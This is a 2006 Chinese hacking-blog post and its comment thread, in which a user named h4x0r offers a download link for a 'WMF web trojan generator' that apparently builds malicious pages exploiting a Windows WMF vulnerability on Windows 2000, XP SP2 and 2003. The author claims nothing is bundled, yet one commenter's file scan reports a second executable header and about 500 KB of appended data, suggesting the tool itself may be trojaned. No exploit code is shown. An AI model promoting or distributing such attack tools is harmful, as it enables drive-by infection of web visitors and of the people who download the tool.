Category: 原创作品
2006-04-28 19:25:10 by: h4x0r
Selected Content

WMF网页木马生成器 过全系统 [推荐]

Font Size: Large | Medium | Small
第一次写,程序代码是GUI哥的,他利用的是MS06001,而我是利用下面出来的MS漏洞,也是通过WMF漏洞来实现攻击,win2000,winxp sp2 以及win2003 通过!
欢迎测试,没有捆绑任何东西! 压缩前可以检测下!
uploads/200604/28_202311_132120fa7fdc4f3f9503f12af1b1189a.gif

下载地址:http://www.gz852.com/down/入侵工具/wmfmuma.rar
[Last Modified By h4x0r, at 2006-04-28 20:23:16]
Comments Feed Comments Feed: http://www.4evil.org/feed.asp?q=comment&id=693

View Mode: Show All | Comments: 5 Trackbacks: 7 Toggle Order | Views: 1264
Quote 42年的矿泉水
[ 2006-04-29 19:34:47 ]
呵呵虽然没有火狐内部的网页木马生成器好,但是你花了力气写这个东西我还是强烈支持的,
Quote 樱木花盗
[ 2006-04-30 23:51:59 ]
哇。。。好使! [yes]
Quote wszf
[ 2006-05-04 02:17:03 ]
不知道你这是什么意思??
开始分析...
文件位置:C:\Documents and Settings\Admin\桌面\wmfmuma\wmf.exe
文件长度:568894Byte(s)

文件头部分析...
可执行头部数:2个
文件可能经过捆绑,请小心使用!

分析全部结束

- 正在分析文件.....
- 正在查找额外的数据........
- 正在检查寄生(注入)了的数据..............

-> 7AE3Dh 额外的数据找到, 正在开始分离......... 10000h.

这就意味着:
这个文件包涵了 503357 额外的数据字节 .
碎片的大小大约有 64 KB.

你现在可以尝试去清理文件.............

难道是那个ms0601的那个利用程序在里面??
或者是别的东西。。
Quote Mask*
[ 2006-05-28 20:51:45 ]
和我运行exe前的动作一模一样,好可怕~ [stun] [stun] [stun]
Quote h4x0r
[ 2006-05-28 21:13:44 ]
你用的什么软件分析?

Post Comment
Smilies
[smile] [confused] [cool] [cry]
[eek] [angry] [wink] [sweat]
[lol] [stun] [razz] [redface]
[rolleyes] [sad] [yes] [no]
[heart] [star] [music] [idea]
Enable UBB Codes
Auto Convert URL
Show Smilies
Hidden Comment
Username:   Password:   Register Now?
Security Code * Please Enter the Security Code